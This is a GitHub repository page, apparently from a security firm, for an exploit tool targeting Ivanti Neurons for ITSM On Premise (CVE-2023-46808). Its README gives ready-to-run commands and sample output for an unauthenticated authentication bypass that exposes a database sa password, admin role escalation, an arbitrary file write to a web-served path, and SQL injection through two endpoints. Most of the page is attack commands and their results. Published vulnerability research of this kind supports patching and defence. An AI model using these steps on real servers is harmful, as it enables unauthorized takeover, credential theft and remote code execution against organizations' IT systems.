Skip to content

synacktiv/itsm-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
ivanti-itsm-exploit.py
ivanti-itsm-exploit.py
 
 
technical_details.md
technical_details.md
 
 

Repository files navigation

Exploits for Ivanti Neurons for ITSM (On Premise)

This script exploits several flaws that allow an unauthenticated attacker to gain administrator access and execute remote commands (CVE-2023-46808) on Ivanti Neurons for ITSM (On Premise).

For technical details, see Technical Details

Affected versions

Versions 2021.1.0.2021060601 to 2020.4.0.2021033001 are affected, and anterior versions are likely to be vulnerable as well.

Usage

Install requirements:

pip install requests defusedxml

List tenants

python3 ivanti-itsm-exploit.py  -u http://<target> --list-tenants
[2025-08-10 21:04:18] [*] Listing tenants: http://<target>/HEAT/
[2025-08-10 21:04:18] [*] [+] Tenants found:
- CentralConfig
- WIN-ITSM

Authentication Bypass

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass

[2025-08-10 21:07:43] [*] Bypassing authentication: http://<target>/HEATSurveyProxy/SaaSSurvey.asmx
HTTP RESPONSE:
<?xml version="1.0" ?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<soap:Body>
		<AuthenticateAPIResponse xmlns="http://www.frontrange.com/WebSurvey/">
			<AuthenticateAPIResult>
				<TenantId>WIN-ITSM</TenantId>
				<LoginId>HEATAdmin</LoginId>
				<SessionId>OMJC56DSECOCHU6UT9SKGVLP0VLF00U6</SessionId>
				<ConnectionString>server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM</ConnectionString>
				<ProviderName>System.Data.SqlClient</ProviderName>
				<UseServerTimeZone>false</UseServerTimeZone>
				<SessionKey>WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1</SessionKey>
				<SessionKeyExpire>638915620626330227</SessionKeyExpire>
				<AuthenticationStatus>Success</AuthenticationStatus>
			</AuthenticateAPIResult>
		</AuthenticateAPIResponse>
	</soap:Body>
</soap:Envelope>

[2025-08-10 21:07:43] [+] Database connection string found: server=WIN-ITSM;Integrated Security=False;MultipleActiveResultSets=True;user id=sa;password=Password123;initial catalog=HEATSM
[2025-08-10 21:07:43] [+] Session key (SID) found: WIN-ITSM#OMJC56DSECOCHU6UT9SKGVLP0VLF00U6#1
[2025-08-10 21:07:43] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:07:43] [+] Current role: Admin
[2025-08-10 21:07:43] [+] CSRF Token: lbDMPZLNUCjRdF9tlN8Vry3kr1o

Remote arbitrary file write

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass upload --file a
[...]
[2025-08-10 21:08:55] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:08:55] [+] Current role: Admin
[2025-08-10 21:08:55] [+] CSRF Token: GOjTQIMGuCIwjDEXaw2eU-H_tao
[2025-08-10 21:08:55] [*] Adding file in database
HTTP RESPONSE:
<textarea>{"success":true,"msg":"Your file has been uploaded"}</textarea>
[2025-08-10 21:08:55] [*] Writing file connection id: 95489760790959413597285398825941
HTTP RESPONSE:
{"d":null}
[2025-08-10 21:08:55] [*] Checking file path
HTTP RESPONSE:
{"d":"C:\\\\\\\\Program Files\\\\\\\\HEAT Software\\\\\\\\HEAT\\\\\\\\AppServer\\\\\\\\Input\\WIN-ITSM\\"}
[2025-08-10 21:08:55] [+] Success ! File written at: C:\\\\Program Files\\\\HEAT Software\\\\HEAT\\\\AppServer\\\\Input\WIN-ITSM\
[2025-08-10 21:08:55] [+] File URL: /HEAT/Input/WIN-ITSM/Default.aspx

SQL injection

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-package --sql "SELECT * from master..syslogins WAITFOR DELAY '0:0:20';"
[...]
[2025-08-10 21:13:37] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:13:37] [+] Current role: Admin
[2025-08-10 21:13:37] [+] CSRF Token: 74652LoPMbH3uy0Rf42lSDn2aoE
[2025-08-10 21:13:37] [*] Exploiting PackageImportHandler.ashx SQLI : http://<target>/HEAT/AdminUI/handlers/PackageImportHandler.ashx
[2025-08-10 21:13:57] [+] Success ! HTTP RESPONSE:
<html><body>{"completed":true,"applied":true,"errors":[],"warnings":[]}<body></html>

Use ITSM as a client for a remote database:

python3 ivanti-itsm-exploit.py -v  -u http://<target> -t WIN-ITSM --auth-bypass sqli-asset --sql "master..syslogins WAITFOR DELAY '0:0:10'--" -u sa -p Password123 -s WIN-ITSM -d ConfigDB
[...]
[2025-08-10 21:14:27] [+] Session key (SID) found: WIN-ITSM#2OK3EV6F3F73L1KM3A0R0G3S5UA05VHR#1
[2025-08-10 21:14:27] [*] Add Admin role to session: http://<target>/HEAT/Services/Session.asmx/SelectRole
[2025-08-10 21:14:27] [+] Current role: Admin
[2025-08-10 21:14:27] [+] CSRF Token: fnNhibelOJoOxaTihGUd9PG4vXM
[2025-08-10 21:14:27] [*] Exploiting GetAssetXML SQLI : http://<target>/HEAT/AdminUI/services/IntegrationNew.asmx/GetAssetXML
[2025-08-10 21:14:37] [+] Success ! HTTP RESPONSE:
{"d":"Preview failed - SCCMTransformer.GetKeys - Failed to retrieve random key value from SCCM serverSystem.IndexOutOfRangeException: 1\r\n   at System.Data.ProviderBase.FieldNameLookup.GetOrdinal(String fieldName)\r\n   at System.Data.SqlClient.SqlDataReader.GetOrdinal(String name)\r\n   at System.Data.SqlClient.SqlDataReader.get_Item(String name)\r\n   at FrontRange.Integration.Adapter.Container.SCCMContainerBase.GetRandomKey(SCCMAdapterConnectionDef connectionDef)"}

About

Ivanti Neurons for ITSM (On Premise) exploits

Resources

Readme
Activity
Custom properties

Stars

8 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages